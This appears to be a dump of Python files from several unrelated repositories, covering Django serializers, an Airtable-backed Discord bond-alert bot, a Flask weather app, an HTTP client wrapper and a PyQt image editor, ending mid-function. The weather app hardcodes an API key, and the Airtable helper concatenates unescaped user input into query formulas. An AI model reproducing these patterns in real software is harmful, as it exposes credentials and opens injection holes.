return paginator.get_paginated_response(serializer).data"""
def get_reaction(self, post):
reaction = None
request = self.context.get("request")
if request and hasattr(request, "user"):
if post.likes.filter(id=request.user.id).exists():
reaction = 'liked'
elif post.dislikes.filter(id=request.user.id).exists():
reaction = 'disliked'
return reaction
class PostLikesSerializer(serializers.ModelSerializer):
username = serializers.ReadOnlyField()
avatar = serializers.SerializerMethodField()
class Meta:
model = User
fields = ("username","avatar")
def get_avatar(self, obj, size=settings.AVATAR_DEFAULT_SIZE):
for provider_path in settings.AVATAR_PROVIDERS:
provider = import_string(provider_path)
avatar_url = provider.get_avatar_url(obj, size)
if avatar_url:
return avatar_url
class PostReportListSerializer(serializers.ModelSerializer):
reports_count = serializers.SerializerMethodField()
url = serializers.HyperlinkedIdentityField(
view_name='posts-detail',
read_only=True
)
class Meta:
model= Post
fields = ('id', 'reports_count', 'url',)
def get_reports_count(self,post):
return post.reports.count()
```
#### File: happy/posts/validators.py
```python
import os
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
def validate_file_extension_and_size(value):
valid_extensions = ['.jpg','.png','.mp4','.gif']
MAX_UPLOAD_SIZE = 5242880
ext = os.path.splitext(value.name)[1]
if not ext.lower() in valid_extensions:
raise ValidationError(_('Unsupported file extension.'))
if ext.lower() in valid_extensions:
if value.size > MAX_UPLOAD_SIZE :
raise ValidationError(
_('%(file_name)s has not been uploaded: File too big.'))
``` |
{
"source": "0xRusowsky/discord-bots",
"score": 3
} |
#### File: src/bond_alerts/airtable_utils.py
```python
import os
from pyairtable import Table
from pyairtable.formulas import match
from collections import namedtuple
# Initiallize Airtable
api_key = os.environ['AIRTABLE_API_KEY']
alerts_app = 'appTX60pjw7iWGz4Y'
alerts_table = 'tblkVGjvsmwrI7vMn'
master_data_app = 'appAQXkU6sdPuQ1p6'
bonds_table = 'tbl5zIl9EZKaras54'
tokens_table = 'tblQLIlas6IBvWz6Y'
alert_db = Table(api_key, alerts_app, alerts_table)
bond_db = Table(api_key, master_data_app, bonds_table)
token_db = Table(api_key, master_data_app, tokens_table)
Bond = namedtuple("Bond", "bond price_usd discount max_purchase debt_reached")
Token = namedtuple("Token", "token price_klima")
Alert = namedtuple("Alert", "bond discount user")
def search_alert(table: Table, search_bond: str = None, search_user: str = None, search_discount: float = None, search_active: bool = None, search_type: str = None): # noqa: E501
if search_type == 'triggered':
if search_bond is not None and search_discount is not None:
formula = "AND({active}=1,{bond}='"+str(search_bond)+"',{discount}<='"+str(search_discount)+"')" # noqa: E501
elif search_type == 'reactivate':
if search_bond is not None and search_discount is not None:
formula = "AND({active}=0,{bond}='"+str(search_bond)+"',{discount}>'"+str(search_discount)+"')" # noqa: E501
else:
if search_bond is not None and search_user is not None and search_discount is not None:
formula = "AND({bond}='"+str(search_bond)+"',{user}='"+str(search_user)+"',{discount}<='"+str(search_discount)+"')" # noqa: E501
elif search_user is not None and search_discount is not None:
formula = "AND({user}='"+str(search_user)+"',{discount}<='"+str(search_discount)+"')"
elif search_bond is not None and search_user is not None:
formula = match({'bond': search_bond, 'user': search_user})
elif search_bond is not None:
formula = match({'bond': search_bond})
elif search_user is not None:
formula = match({'user': search_user})
elif search_discount is not None:
formula = "AND({discount}<='"+str(search_discount)+"')"
r = table.all(formula=formula)
rr = []
if r is not None:
for a in r:
rr.append(Alert(a['fields']['bond'], a['fields']['discount'], a['fields']['user']))
return(rr)
def activate_alert(table: Table, search_bond: str, search_user: str, search_discount: float):
formula = match({'bond': search_bond, 'user': search_user, 'discount': search_discount})
r = table.first(formula=formula)
table.update(r['id'], {'active': True})
def deactivate_alert(table: Table, search_bond: str, search_user: str, search_discount: float):
formula = match({'bond': search_bond, 'user': search_user, 'discount': search_discount})
r = table.first(formula=formula)
table.update(r['id'], {'active': False})
def fetch_bond_md(table: Table, search_bond: str):
formula = match({'bond': search_bond, 'active': True})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['address'], r['fields']['quote_token'])
def fetch_token_md(table: Table, search_token: str):
formula = match({'token': search_token})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['pool_address'], r['fields']['pool_base_token'])
def fetch_bond_info(table: Table, search_bond: str):
formula = match({'bond': search_bond, 'active': True})
r = table.first(formula=formula)
if r is not None:
if 'debt_reached' in r['fields']:
return(Bond(r['fields']['bond'], r['fields']['price_usd'], r['fields']['discount'], r['fields']['max_purchase'], r['fields']['debt_reached'])) # noqa: E501
else:
return(Bond(r['fields']['bond'], r['fields']['price_usd'], r['fields']['discount'], r['fields']['max_purchase'], False)) # noqa: E501
def fetch_token_info(table: Table, search_token: str):
formula = match({'token': search_token})
r = table.first(formula=formula)
if r is not None:
return(r['fields']['price_klima'], r['fields']['price_usd'])
def active_bonds(table: Table):
formula = match({'active': True})
r = table.all(formula=formula)
if r is not None:
rr = []
for b in r:
rr.append(b['fields']['bond'])
return(rr)
def active_tokens(table: Table):
formula = match({'active': True})
r = table.all(formula=formula)
if r is not None:
rr = []
for b in r:
rr.append(b['fields']['token'])
return(rr)
def update_bond_info(table: Table, update_bond: str, update_price: float, update_disc: float, update_capacity: float, update_debt: bool): # noqa: E501
formula = match({'bond': update_bond})
r = table.first(formula=formula)
table.update(r['id'], {'price_usd': update_price, 'discount': update_disc, 'max_purchase': update_capacity, 'debt_reached': update_debt}) # noqa: E501
def update_token_info(table: Table, update_token: str, update_price_klima: float, update_price_usd: float):
formula = match({'token': update_token})
r = table.first(formula=formula)
table.update(r['id'], {'price_klima': update_price_klima, 'price_usd': update_price_usd})
def add_alert(table: Table, add_bond: str, add_discount: float, add_user: str):
bond_check = fetch_bond_info(bond_db, add_bond)
if bond_check is not None:
alert_check = search_alert(table, search_user=add_user)
if len(alert_check) < 5:
for a in alert_check:
if a == (add_bond, float(add_discount), add_user):
# Alert already configured
return(0)
# All checks passed, create alert
try:
table.create({'bond': add_bond, 'user': add_user, 'discount': add_discount})
return(1)
except Exception as e:
print(e)
return(-999)
else:
# User already has 5 alerts configured
return(-1)
else:
# Bond does not exist or not active anymore
return(-2)
def remove_alert(table: Table, delete_bond: str, delete_discount: float, delete_user: str):
formula = match({'bond': delete_bond, 'user': delete_user, 'discount': delete_discount})
r = table.first(formula=formula)
if r is not None:
try:
table.delete(r['id'])
return(1)
except Exception as e:
print(e)
return(-999)
else:
# Alert does not exist
return(0)
``` |
{
"source": "0xsakthi/Weather-app",
"score": 3
} |
#### File: 0xsakthi/Weather-app/app.py
```python
from flask import Flask, render_template, request
import pyowm
app = Flask(__name__)
@app.route('/')
def main():
return render_template('index.html')
@app.route('/send', methods=['POST','GET'])
def send(sum=sum):
city = request.form['city'].upper()
zipc = request.form['zipcode']
owm = pyowm.OWM('1afed1bcc62bc124f1824838273eed19')
mgr = owm.weather_manager()
obs = mgr.weather_at_zip_code('{}'.format(zipc),'IN')
weather = obs.weather
temperature = weather.temperature(unit='celsius')['temp']
res1 = f'The Temperature : {temperature} degrees celsius.'
res2 = 'The Current weather Of {}'.format(city)
humidity = weather.humidity
res3 = f'Humidity : {humidity}'
current = weather.detailed_status
res4 = f'Currently : {current}'
return render_template('index.html',res1=res1, res2=res2,res3=res3,res4=res4)
``` |
{
"source": "0xsamsar/MetaFarmerX",
"score": 3
} |
#### File: adapters/apis/http_client.py
```python
import urllib3
import json
import requests
class HTTPClient(object):
"""
Wraps HTTP Client with custom filtering
"""
def __init__(self, _uri='', _query={}, _filter=True, _filter_keys=[]):
self._uri = _uri
self._query = _query
self._timeout = 5
self._filter = _filter
self._filter_keys = _filter_keys
self._response_json = {}
##########################################################################
def get_response(self):
"""
Get response
"""
return self._response_json
##########################################################################
def filter_response(self):
"""
Filter response by accesing key pairs in the json object
"""
if self._filter:
json_obj = self._response_json
for key in self._filter_keys:
json_obj = json_obj[key]
self._response_json = json.dumps(json_obj)
##########################################################################
def send_request(self):
"""
Send HTTP request
"""
try:
self._response = requests.get(self._uri, params=self._query, timeout=self._timeout)
self._response_json = self._response.json()
self._response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print(errh)
except requests.exceptions.ConnectionError as errc:
print(errc)
except requests.exceptions.Timeout as errt:
print(errt)
except requests.exceptions.RequestException as err:
print(err)
##########################################################################
def call(self):
"""
Call the API
"""
self.send_request()
self.filter_response()
self._response.close()
``` |
{
"source": "0xsapphir3/GalleryMan",
"score": 2
} |
#### File: GalleryMan/assets/editorButtonsHelper.py
```python
from GalleryMan.utils.imageDoodler import doodleImage
from GalleryMan.assets.cropper import ImageCropper
from GalleryMan.utils.infoFinder import getMoreInfo
import os
from functools import partial
from PIL import Image
from PyQt5.QtCore import (
QAbstractAnimation,
QParallelAnimationGroup,
QPoint,
QRect,
QRectF,
QSize,
QThread,
QVariant,
QVariantAnimation,
Qt,
pyqtBoundSignal,
pyqtSlot,
)
from GalleryMan.assets.QEditorButtons import FilterView, PaletteView
from configparser import ConfigParser
from PyQt5.QtGui import (
QFont,
QFontMetrics,
QImage,
QKeySequence,
QMouseEvent,
QPixmap,
QTransform,
)
from PyQt5.QtWidgets import (
QApplication,
QDialog,
QGraphicsScene,
QGraphicsView,
QHBoxLayout,
QLabel,
QLineEdit,
QMainWindow,
QScrollArea,
QShortcut,
QSlider,
QVBoxLayout,
QWidget,
)
from GalleryMan.assets.QtHelpers import (
Animation,
PopUpMessage,
QCustomButton,
QLayoutMaker,
QSliderMenu,
)
from json import loads
from GalleryMan.utils.helpers import *
from GalleryMan.utils.stickersArena import stickersViewer
import sys
class CustomLabel(QLabel):
"""A Custom, Clickable Label"""
clicked = pyqtSignal(QPoint)
def __init__(self, parent=None, listenFor=Qt.LeftButton):
super().__init__(parent=parent)
# Make the listenFor variable global
self.listenFor = listenFor
def mouseReleaseEvent(self, event: QMouseEvent):
# Check for the mouse release event
if event.button() == self.listenFor:
# Emit the clicked function
self.clicked.emit(event.pos())
self.eventPos = event.pos()
def click(self):
self.clicked.emit()
class QRotateLabel(QLabel):
"""A Custom, Rotatable `QLabel`"""
def __init__(self, *args, **kwargs):
super(QRotateLabel, self).__init__(*args, **kwargs)
# Make the pixmap global
self._pixmap = QPixmap()
# A variable to store current rotation
self.curr = 0
# Initial degree
self.initial = 0
# Init animation
self.init_ani()
def init_ani(self):
# Create a animation
self._animation = QVariantAnimation(
self,
startValue=self.initial,
endValue=self.curr,
duration=100,
valueChanged=self.on_valueChanged,
)
# Set the initial value with the current degree
self.initial = self.curr
def set_pixmap(self, pixmap):
# Change the pixmap
self._pixmap = pixmap
# Set the pixmap
self.setPixmap(self._pixmap)
def start_animation(self, deg):
# Check if animation isn't running
if self._animation.state() != QAbstractAnimation.Running:
# Swap the degrees
self.curr, self.initial = deg, self.curr
# Create a animation with new degree
self.init_ani()
# Start the animation
self._animation.start()
def get_curr_deg(self):
return self.curr % 360
@pyqtSlot(QVariant)
def on_valueChanged(self, value):
# Rotate the pixmap
t = QTransform()
t.rotate(value)
self.setPixmap(self._pixmap.transformed(t))
class QEditorHelper:
LIKED_FOLDERS = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "likedFolders.txt")
exited = pyqtBoundSignal()
def __init__(
self,
parent: QApplication,
application: QMainWindow,
central: QWidget,
config: ConfigParser,
newParent: QScrollArea,
out_widget,
callback,
dir: str,
main_window: QLabel
) -> None:
# Make every args global
self.callback = callback
self.main_window = main_window
self.parent = parent
self.application = application
self.original = newParent.widget().layout()
self.newParent = newParent
self.out_widget = out_widget
self.config = config
self.central = central
self.dir = dir
# Make a popup mmessage instance
self.popup = PopUpMessage()
# Hide the scrollArea to switch the buttons with the new buttons
self.animation = Animation.fadingAnimation(Animation, self.central, 200, True)
# Start the animation
self.animation.start()
# Again show the scroll area when finished
self.animation.finished.connect(self.central.show)
def addtoLiked(self, directory_path, inst):
# Get the heart widget
self.heartWidget = inst.heartWidget
# Get the icons
icons = inst.iconStyles
# Read all the currently liked photos
with open(self.LIKED_FOLDERS) as file:
dirs = loads(file.read())
# Check if the directory that will be added to liked is already there or not
if directory_path in dirs:
# Remove it from liked if it is already thete
AddToLiked(self.application, directory_path, True).run()
# Show a new message
self.popup.new_msg(self.application, "Image Removed From Liked Images", 400)
# Change its color
self.heartWidget.setStyleSheet(
"color: {}; font-size: {}px; font-family: {}".format(
icons[0], icons[1], icons[2]
)
)
else:
# Add to liked
AddToLiked(self.application, directory_path).run()
# New message
self.popup.new_msg(self.application, "Image Added To Liked Images", 400)
# Chnage colors
self.heartWidget.setStyleSheet(
"color: {}; font-size: {}px; font-family: {}".format(
"#BF616A", icons[1], icons[2]
)
)
def copyToClipboard(self, fileName):
# Add the image to the application's clipboard
self.parent.clipboard().setPixmap(QPixmap(fileName))
self.popup.new_msg(self.application , "Image Copied To Clipboard" , 400)
def showEditButtons(self, directory):
# Callback when animation is over
def animation_callback():
# Hide the scrollArea and change the buttons while it is hidden
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(self.globalLayout)
self.newParent.setWidget(new_label)
# Show the scrollArea
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
# Get the preffered icons
self.icons = loads(self.config.get("singleFolder", "editButtons-icons"))
# Create an instance of the handler of this layout
editButtons = ImageEditButtons(
self,
directory,
self.application,
self.newParent,
self.config,
self.out_widget,
)
# Make a layout from the buttons and function
self.functions = [
editButtons.flipImage,
editButtons.rotater,
editButtons.cropImage,
editButtons.filterImage,
editButtons.stickerImage,
editButtons.doodleImage,
editButtons.addTextToImage,
editButtons.imageAdjustment,
lambda: self.swapLayout(self.original),
]
self.globalLayout = QLayoutMaker(self.icons, self.functions).make()
# Change the layout
editButtons.inst = self.globalLayout
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def swapLayout(self, layout):
def animation_callback():
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(layout)
self.newParent.setWidget(new_label)
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def moveToTrash(self, directory):
# Relace the directory to the app's trash folder
try:
os.replace(
directory,
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashFiles" , directory[directory.rindex("/") + 1 :])
)
except:
print(bcolors.WARNING + "The image may have been deleted or moved. Exiting...")
exit(0)
# Now open the trash file logs and add a entry
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt"), "r") as f:
now = dict(loads(f.read()))
now[
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashFiles" , directory[directory.rindex("/") + 1 :])
] = directory
# Write the updated information
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt"), "w") as f:
f.write(dumps(now))
# Animate
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(
Animation.fadingAnimation(Animation, self.out_widget.parent(), 300)
)
self.animation.addAnimation(
Animation.fadingAnimation(Animation, self.central, 300)
)
self.animation.start()
self.animation.finished.connect(self.out_widget.hide)
self.animation.finished.connect(self.central.hide)
# Add a new message when its completed
self.popup.new_msg(self.application, "Item Moved To Trash", 400)
if("--show" in sys.argv):
print(bcolors.OKCYAN + "Exiting... As you have closed the window for the --show session.")
exit(1)
self.callback()
def moreInfo(self, directory):
# Get preferred icons
self.icons = loads(self.config.get("singleFolder", "moreOptions-icons"))
# Create an instance of the handdler
moreInfo = getMoreInfo(
self.newParent, self.out_widget, directory, self.application
)
# Merge the buttons with the function
self.func = [
moreInfo.getInfo,
moreInfo.rename,
moreInfo.showInFullScreen,
moreInfo.callback,
]
# Make the layout and swap
self.layout = QLayoutMaker(self.icons, self.func).make()
self.swapLayout(self.layout)
def closeWithSave(self , directory):
self.dialog = QDialog(self.application)
buttonsLayout = QHBoxLayout()
save = QCustomButton("Save and Close" , None).create()
save.setFixedWidth(230)
save.setStyleSheet("""
color: #FFF;
font-size: 20px;
font-family: Comfortaa;
border: 1px solid #3B4252;
padding: 10px
""")
buttonsLayout.addWidget(save , alignment=Qt.AlignLeft)
save.clicked.connect(self.save)
discard = QCustomButton("Discard and Close" , None).create()
discard.setStyleSheet("""
color: #FFF;
font-size: 20px;
font-family: Comfortaa;
border: 1px solid #3B4252;
padding: 10px
""")
discard.clicked.connect(self.discard)
discard.setFixedWidth(230)
buttonsLayout.addWidget(discard , Qt.AlignRight)
self.dialog.setLayout(buttonsLayout)
self.dialog.setFixedSize(500 , 100)
self.dialog.exec_()
def discard(self):
if("--show" in sys.argv):
print(bcolors.WARNING + "Image from being saved was discarded. Exiting")
exit(1)
self.dialog.hide()
self.callback()
def save(self):
parent = self.dir[:self.dir.rindex("/")]
file = self.dir[self.dir.rindex("/") + 1:self.dir.rindex(".")] + '-edited.png'
os.replace(os.path.join("GalleryMan" , "assets" , "processed_image.png" ) , os.path.join(parent , file))
if("--show" in sys.argv):
print(bcolors.OKCYAN + "\nImage was saved as {}. Exiting...\n".format(os.path.join(parent , file)))
exit(1)
self.dialog.hide()
self.callback()
class ImageEditButtons:
def __init__(
self,
inst,
dir,
parent: QMainWindow,
outParent: QScrollArea,
config: ConfigParser,
renderArea: QRotateLabel,
) -> None:
self.msg = "app"
self.originalGeo = outParent.widget().geometry()
# Make all the args global
self.parent = parent
self.originalWidget = outParent.widget()
self.dir = dir
self.originalResponser = parent.resizeEvent
self.inst = inst
self.outParent = outParent
self.renderArea = renderArea
self.config = config
self.original = outParent.widget().layout()
def rotater(self):
# Get the preffered icons
icons = loads(self.config.get("singleFolder", "editorRotater-icons"))
# A input box to show the current degree
self.sliderValue = QLineEdit()
# Make an intsance of the handler function
self.interiorFunctions = cropImage(
self.dir, self.outParent, self.renderArea, self.sliderValue, self.handleFunc
)
# Make a layout
func = [
lambda: self.interiorFunctions.rotate90(),
lambda: self.interiorFunctions.rotate90Right(),
lambda: self.interiorFunctions.save(self.callback),
lambda: self.callback(),
]
parentLayout = QVBoxLayout()
childLayout = QHBoxLayout()
# Add the slider to layout
self.slider = QSlider(self.outParent)
# Set fixed maximum and minimum values
self.slider.setMaximum(360)
self.slider.setMinimum(0)
self.slider.valueChanged.connect(self.rotateLabel)
# Some Stylings
self.slider.setStyleSheet(
"""
QSlider::groove:horizontal{{
background-color: {};
border-radius: {}px;
border: {}px solid {}
}}
QSlider::handle:horizontal{{
width: {}px;
height: {}px;
color: {};
border-radius: {}px;
border: {}px solid {};
}}
""".format(
self.config.get("singleFolder", "slider-backgroundColor"),
self.config.get("singleFolder", "slider-borderRadius"),
self.config.get("singleFolder", "slider-borderWidth"),
self.config.get("singleFolder", "slider-borderColor"),
self.config.get("singleFolder", "slider-holderWidth"),
self.config.get("singleFolder", "slider-holderHeight"),
self.config.get("singleFolder", "slider-holderColor"),
self.config.get("singleFolder", "slider-holderRadius"),
self.config.get("singleFolder", "slider-holderBorderWidth"),
self.config.get("singleFolder", "slider-holderColor"),
)
)
# set the value to 0 for first time
self.sliderValue.setText("0")
# Rotate the label when the text is changed
self.sliderValue.textChanged.connect(partial(self.rotateLabel , "textBox"))
# Set orientation
self.slider.setOrientation(Qt.Horizontal)
# Stylings
self.sliderValue.setStyleSheet(
"""
border-radius: {}px;
border: {}px solid {};
color: {};
background-color: {}
""".format(
self.config.get("singleFolder" , "input-borderRadius"),
self.config.get("singleFolder" , "input-borderWidth"),
self.config.get("singleFolder" , "input-borderColor"),
self.config.get("singleFolder" , "input-textColor"),
self.config.get("singleFolder" , "input-backgroundColor"),
))
# Fixed size
self.sliderValue.setFixedSize(QSize(
int(self.config.get("singleFolder" , "input-width")),
int(self.config.get("singleFolder" , "input-height"))
))
# Add to layouts
childLayout.addWidget(self.slider)
childLayout.addWidget(self.sliderValue)
parentLayout.addLayout(childLayout)
# Make layout
layout = QLayoutMaker(icons, func).make()
# Swap layout
parentLayout.addLayout(layout)
self.swapLayout(parentLayout)
def handleFunc(self):
self.msg = "custom"
self.slider.setValue(int(self.sliderValue.text()))
def cropImage(self):
# Initate the cropper class
cropper = ImageCropper(self.parent, self.renderArea , self.config)
# Show the cropper
cropper.show()
def filterImage(self):
# Initate the filter class
filters = FilterView(
self.parent,
self.renderArea,
self.outParent,
loads(self.config.get("singleFolder", "filters-colorIcons")),
self.callback,
)
# Functions and make a layout
func = [
lambda: filters.shady(),
lambda: filters.sepia(),
lambda: filters.cherry(),
lambda: filters.underwater(),
lambda: filters.purple(),
lambda: filters.pink(),
lambda: filters.dark(),
lambda: filters.clear(),
lambda: filters.realistic(),
lambda: filters.cool_filter(),
lambda: filters.grayscale(),
lambda: filters.remove_self(),
]
layout = QLayoutMaker(
loads(self.config.get("singleFolder", "filters-colorIcons")), func
).make()
# Swap layout
self.swapLayout(layout)
def stickerImage(self):
# Create a sticker viewer instance
myStickers = stickersViewer(self.parent , self.renderArea, self.outParent , self.callback)
# Show the stock
myStickers.initStock()
def doodleImage(self):
# Initate the class
doodle = doodleImage(self.parent, self.renderArea, self.outParent , self.dir)
# get all the respective functions
func = [
lambda: doodle.freeHand(),
lambda: doodle.drawRect(),
lambda: doodle.line(),
lambda: doodle.circle(),
lambda: doodle.polygon(),
lambda: doodle.floodImage(),
self.callback
]
# Get the preffered icons
icons = loads(self.config.get("singleFolder" , "doodler-icons"))
# Make the layout and swap
layout = QLayoutMaker(icons, func).make()
self.swapLayout(layout)
def swapWidget(self , newWidget):
def run_second():
self.outParent.setWidget(newWidget)
self.animation = Animation.fadingAnimation(Animation , self.outParent.parent() , 200 , True)
self.animation.finished.connect(self.outParent.show)
self.animation.start()
self.animation = Animation.fadingAnimation(Animation , self.outParent.parent() , 200)
self.animation.finished.connect(run_second)
self.animation.start()
def addTextToImage(self):
# Initate the text in image class
textToImage = textInImage(self.parent, self.renderArea, self.outParent , self.dir)
# Create the graphics
textToImage.createGraphics()
def imageAdjustment(self):
# Get the preffered icons
icons = loads(self.config.get("singleFolder", "filter-icons"))
# Initate the handler class
view = PaletteView(
None,
os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"),
self.renderArea,
self.config,
)
# Get respective functions and make layout
func = [
lambda: view.blur(),
lambda: view.sharp(),
lambda: view.increaseBrightness(),
lambda: view.increaseContrast(),
lambda: view.increaseExposure(),
self.callback
]
layout = QLayoutMaker(icons, func).make()
# Swap layout
self.swapLayout(layout)
def flipImage(self):
# Create a image flipper class' instance
flipper = imageFlipper(self.renderArea, self.outParent)
# Get the respective functions
func = [
lambda: flipper.flipLeft(),
lambda: flipper.flipTop(),
lambda: self.callback(),
]
# Get the preffered icons
icons = loads(self.config.get("singleFolder", "flipper-icons"))
# Swap the layout
layout = QLayoutMaker(icons, func).make()
self.swapLayout(layout)
def swapLayout(self, layout):
# Get the main widget
self.central = self.outParent.parent()
# Animation callback
def animation_callback():
# Hide the area when it is being formatted
self.outParent.hide()
new_label.setGeometry(self.outParent.takeWidget().geometry())
new_label.setLayout(layout)
self.outParent.setWidget(new_label)
# Show on complete
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.outParent.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.outParent.parent(), 500)
self.animation.finished.connect(animation_callback)
self.animation.start()
def callback(self , geometry=None):
self.icons = loads(self.config.get("singleFolder", "editButtons-icons"))
self.renderArea.setPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
self.functions = [
self.flipImage,
self.rotater,
self.cropImage,
self.filterImage,
self.stickerImage,
self.doodleImage,
self.addTextToImage,
self.imageAdjustment,
lambda: self.swapLayout(self.original)
]
self.layout = QLayoutMaker(self.icons, self.functions).make()
self.new_label = QLabel()
# if(geometry == None):
self.new_label.setGeometry(self.outParent.takeWidget().geometry())
# else:
# self.new_label.setGeometry(geometry)
self.new_label.setLayout(self.layout)
self.outParent.setWidget(self.new_label)
self.swapLayout(self.layout)
def rotateLabel(self , _from="slider"):
if(self.msg == "custom"):
self.msg = "app"
return
if(_from == "textBox"):
self.interiorFunctions.fixedIncrease(int(self.sliderValue.text()))
self.slider.setValue(int(self.sliderValue.text()))
return
self.interiorFunctions.fixedIncrease(self.slider.value())
class cropImage:
SAVE_DIR = os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")
def __init__(
self, dir: str, newParent, renderArea: QRotateLabel, outDisplay: QLineEdit, callback
) -> None:
# Make every args global
self.directory = dir
self.image = Image.open(self.directory)
self.outDisplay = outDisplay
self.renderArea = renderArea
self.rotations = 0
self.callback = callback
self.degree = 0
self.newParent = newParent
def rotate90(self):
# Add 90 to the degree
self.degree += 90
# Add rotation
self.rotations += 1
self.updateUi()
def rotate90Right(self):
# Subtract the rotation (due to reverse rotation)
self.degree -= 90
self.rotations -= 1
self.updateUi()
def customIncrease(self , increase):
# Subtract the rotation (due to reverse rotation)
self.degree += increase
self.updateUi()
def fixedIncrease(self , const):
self.degree = const
self.updateUi()
def updateUi(self):
# Update the text
self.outDisplay.setText(str(abs(self.degree) % 360))
# Start the animation
self.renderArea.start_animation(abs(self.degree) % 360)
# Update the image
self.updateImage()
self.callback()
def updateImage(self):
# Update the pillow image
self.image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
def swapLayout(self, layout):
# Get the central widget of the QScrollArea
self.central = self.newParent.parent()
# Callback
def animation_callback():
# Hide the scrollArea while it is updated
self.newParent.hide()
new_label.setGeometry(self.newParent.takeWidget().geometry())
new_label.setLayout(layout)
self.newParent.setWidget(new_label)
# Show the widget
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.newParent.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def save(self, callback):
# Open the image using PIL
image = Image.open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")).convert("RGBA")
# Rotate the image
image = image.rotate(-(self.degree % 360), expand=1, fillcolor=(255, 0, 0, 1))
# Save the image
image.save(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png"))
self.degree = 0
self.rotations = 0
# Call the callback
callback()
class textInImage:
def __init__(self, parent, out_widget, scrollArea , dir) -> None:
# Make every argument global
self.dir = dir
self.parent = parent
self.out_widget = out_widget
self.scrollArea = scrollArea
# Create graphics
self.graphics = QGraphicsView(self.parent)
# Call the responser on resize Event
self.graphics.resizeEvent = self.responser
# Show the graphics
self.graphics.show()
# Create a dictionary of the styling
self.storedValue = {
"color": "#D8DEE9",
"font-family": "Comfortaa",
"font-size": 60,
"text": "Your Text"
}
# Create a menu
self.menu = QSliderMenu(self.graphics)
# A button which will show the menui
self.startAni = QCustomButton(" ", self.graphics).create()
self.startAni.move(QPoint(
self.parent.width() - self.startAni.width() - 10,
10
))
self.startAni.clicked.connect(lambda: self.manageMenu())
self.startAni.show()
self.current = 0
def updateStyling(self):
# Change the text with the new text
self.label.setText(self.storedValue["text"])
# Resize the box with the new text
self.resizeToContent(self.label.text())
# Stylings
self.label.setStyleSheet(
"""
color: {};
background-color: transparent;
font-size: {}px;
font-family: {};
""".format(
self.storedValue["color"],
self.storedValue["font-size"],
self.storedValue["font-family"],
)
)
def swapLayout(self, layout):
# Get the central widget
self.central = self.scrollArea.parent()
# Animation callback
def animation_callback():
# Hide the scrollarea while it is updated
self.scrollArea.hide()
new_label.setGeometry(self.scrollArea.takeWidget().geometry())
new_label.setLayout(layout)
self.scrollArea.setWidget(new_label)
# Show the area
self.animation = Animation.fadingAnimation(
Animation, self.central, 200, True
)
self.animation.start()
self.animation.finished.connect(self.scrollArea.show)
# Animate
new_label = QLabel()
self.animation = Animation.fadingAnimation(Animation, self.central, 300)
self.animation.start()
self.animation.finished.connect(animation_callback)
def update(self, property, label):
# Change the dictonary with the new values
self.storedValue[property] = label.text()
# Update the styling with the new values
self.updateStyling()
def createGraphics(self):
# Create a scene
self.scene = QGraphicsScene()
# Set geometry
self.graphics.setGeometry(QRect(0, 0, self.parent.width() , self.parent.height()))
# Add scene
self.graphics.setScene(self.scene)
# Add pixmap
self.scene.addPixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
# Show the graphics
self.graphics.show()
# Move to the top
self.graphics.setAlignment(Qt.AlignTop | Qt.AlignLeft)
# Create a draggable label
self.label = DraggableLabel(None)
# Set text
self.label.setText("Your Text")
# Stylings
self.label.setStyleSheet("""
background-color: transparent;
font-size: 40px;
color: #88C0D0;
font-family: Comfortaa
""")
# Move to desired location
self.label.move(QPoint(100 , 100))
# Add to scene
self.scene.addWidget(self.label)
# Show the label
self.label.show()
self.shortcut = QShortcut(QKeySequence("Ctrl+S") , self.graphics)
self.shortcut.activated.connect(self.saveText)
self.updateStyling()
self.showHelp()
self.original = self.parent.geometry()
self.graphics.paintEvent = self.responser
def resizeToContent(self, text):
# Get the width and the height of the and set size accordingly
font = QFont(
self.storedValue["font-family"], int(self.storedValue["font-size"])
)
met = QFontMetrics(font)
width = met.width(text)
height = met.height()
self.label.setText(text)
self.label.setFixedSize(width, height)
self.label.adjustSize()
def saveText(self):
# Callback
def callback():
self.graphics.hide()
self.out_widget.set_pixmap(QPixmap(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "processed_image.png")))
# Open the image
self.image = Image.open(self.dir)
# Get the geometry
area = QRect(0 , 0 , self.image.width , self.image.height)
# Parse the image
image = QImage(area.size(), QImage.Format_ARGB32_Premultiplied)
painter = QPainter(image)
